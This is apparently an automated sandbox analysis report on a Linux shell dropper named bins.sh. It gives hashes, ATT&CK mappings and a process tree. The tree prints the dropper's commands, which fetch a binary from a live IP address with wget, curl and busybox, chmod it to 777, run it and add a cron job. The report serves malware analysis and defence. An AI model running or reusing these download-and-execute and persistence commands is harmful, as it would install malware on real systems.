ebecfae9d26f90c6a359f204c8aafff6948e28df6e9fc31707db37589222e423

General

Target

bins.sh
Size

10KB
MD5

81a496ac5416f01f492d7eb50039a21c
SHA1

ecfdd7164357b662411ff449bec53c5a7aebc3cf
SHA256

ebecfae9d26f90c6a359f204c8aafff6948e28df6e9fc31707db37589222e423
SHA512

45b404d7ae5e72ba3958dd00940279dfbf8241c3cf0b9f85a3c8735ebec4fb038a3159df3a80636388025d7149d216ca1a9587dd99c5ecde8754380b8a3ee4be
SSDEEP

96:UmC6SBd7G2JT0a6MHjOszPlaqL7Z7p7Fa2F8mEwFC6SBd7wJfbozzPlaqLWy7Z7Z:Un02VUmF1Fa2ypF1Fa2l

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2130) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmod

pid process

677 chmod
Executes dropped EXE 1 IoCs

Processes:

LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2

ioc pid process

/tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 678 LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
Renames itself 1 IoCs

Processes:

LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2

pid process

679 LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.RO09ks crontab
Enumerates running processes
Discovers information about currently running processes on the system
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

curl

description ioc process

File opened for reading /proc/cpuinfo curl

pid	process
677	chmod

ioc	pid	process
/tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2	678	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2

pid	process
679	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.RO09ks	crontab

description	ioc	process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2

description	ioc	process
File opened for reading	/proc/713/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/785/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/818/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/304/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/717/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/769/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/914/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/954/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/959/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/1008/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/709/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/598/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/764/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/815/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/817/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/926/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/42/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/641/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/821/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/894/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/939/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/998/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/1019/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/12/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/715/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/731/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/868/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/885/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/964/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/7/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/721/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/772/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/775/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/905/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/930/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/931/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/989/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/19/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/722/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/766/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/898/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/943/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/1023/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/720/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/711/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/864/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/951/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/960/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/20/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/726/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/738/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/743/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/762/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/803/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/942/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/963/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/14/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/971/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/705/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/733/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/841/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/854/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/900/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
File opened for reading	/proc/909/cmdline	LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

Processes:

busyboxwgetcurl

description	ioc	process
File opened for modification	/tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2	busybox
File opened for modification	/tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2	wget
File opened for modification	/tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:643
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:645
- /usr/bin/wget
  wget http://216.126.231.240/bins/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
  2⤵
  - Writes file to tmp directory
  PID:647
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:671
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
  2⤵
  - Writes file to tmp directory
  PID:676
- /bin/chmod
  chmod 777 LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
  2⤵
  - File and Directory Permissions Modification
  PID:677
- /tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
  ./LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:678
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:680
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:681
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:682
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:683
- /bin/rm
  rm LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2
  2⤵
  PID:688
- /usr/bin/wget
  wget http://216.126.231.240/bins/gVwcxlVQP087VqZxBGUVW7P11yk8Mw4mqq
  2⤵
  PID:692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Cron

1

T1053.003

Persistence

Scheduled Task/Job

1

T1053

Cron

1

T1053.003

Privilege Escalation

Scheduled Task/Job

1

T1053

Cron

1

T1053.003

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Credential Access

Discovery

Network Service Discovery

2

T1046

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/var/spool/cron/crontabs/tmp.RO09ks

Filesize
210B

MD5
eee892c426b7eaf6f3952a0057906804

SHA1
6c0e7f164a9e5d70eab512a1b3be123a54097012

SHA256
1633a8be7b2f7e8f58ab0e00341fca664af9ab755fcba64ddb9d37d445e45b63

SHA512
49f45715882bd81196384564705cfa78c84970b3b9b0a27030c89d3c2f037df2021a317ffdf29385669216ce50edd414a9a6fef09e72011dc583717bc8d6f020

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads